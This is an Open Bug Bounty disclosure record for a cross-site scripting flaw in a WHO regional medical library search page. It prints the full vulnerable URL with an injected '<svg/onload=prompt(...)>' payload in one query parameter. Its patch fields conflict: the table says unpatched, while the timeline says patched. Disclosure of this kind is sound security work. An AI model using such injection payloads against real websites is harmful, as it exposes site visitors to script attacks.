applications.emro.who.int XSS vulnerability

2017-09-01T00:56:00
ID OBB:285753
Type openbugbounty
Reporter eb
Modified 2017-10-03T16:16:00

Description

Vulnerable URL:
http://applications.emro.who.int/library/Databases/wxis.exe/Library/Databases/iah/?IsisScript=iah/iah.xic&base=imemr&form=B&user=guest&lang=i&nextAction=search&indexSearch=^iSU^xSU%20^yINVERTED^uSU_&exprSearch=%22Maternal-Child%20Health%20Centers%22%20OR%20%22Maternal-Fetal%20Relations%22%20OR%20%22Mortality%22%20OR%20%22Neonatal%20Nursing%22%20OR%20%22Neonatal%20Screening%22%20OR%20%22Neonatology%22%20OR%20%22Obstetric%20Surgical%20Procedures%22%20OR%20%22Obstetrical%20Nursing%22%20OR%20%22Obstetrics%22%20OR%20%22Perinatal%20Care%22%20OR%20%22Perinatology%22%20OR%20%22Placenta%22%20OR%20%22Placenta%20Diseases%22%20OR%20%22Pregnancy%22%20OR%20%22Pregnancy%20Complications%22%20OR%20%22Pregnancy%20Outcome%22%20OR%20%22Pregnancy,%20High-Risk%22%20OR%20%22Pregnant%20Women%22%20OR%20%22Prenatal%20Exposure%20Delayed%20Effects%22%20OR%20%22Respiratory%20Distress%20Syndrome,%20Newborn%22%20OR%20%22Vaginal%20Birth%20after%20Cesarean%22%20OR%20%22Illegitimacy%22&conectSearch=AND%20&selected&indexSearch=^iPY^xPY%20^yINVERTED^uPY_&exprSearch=%221985%22%20OR%20%221986%22%20OR%20%221987%22%20OR%20%221988%22%20OR%20%221989%22%20OR%20%221990%22%20OR%20%221991%22%20OR%20%221992%22%20OR%20%221993%22%20OR%20%221994%22%20OR%20%221995%22%20OR%20%221996%22%20OR%20%221997%22%20OR%20%221998%22%20OR%20%221999%22%20OR%20%222000%22%20OR%20%222001%22%20OR%20%222002%22%20OR%20%222003%22%20OR%20%222004%22%20OR%20%222005%22%20OR%20%222006%22%20OR%20%222007%22%20OR%20%222008%22%20OR%20%222009%22%20OR%20%222010%22&conectSearch=%22%3E%3Csvg/onload=prompt%28/XSSPOSED/%29%3E

Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 03.10.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| Unknown / Not calculated
VIP website status:| No

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 1 September, 2017 00:56 GMT
Generic security notifications sent to website owner| 1 September, 2017 06:23 GMT
Vulnerability patched by the website owner| 3 October, 2017 15:26 GMT
Vulnerability details disclosed by researcher| 3 October, 2017 16:16 GMT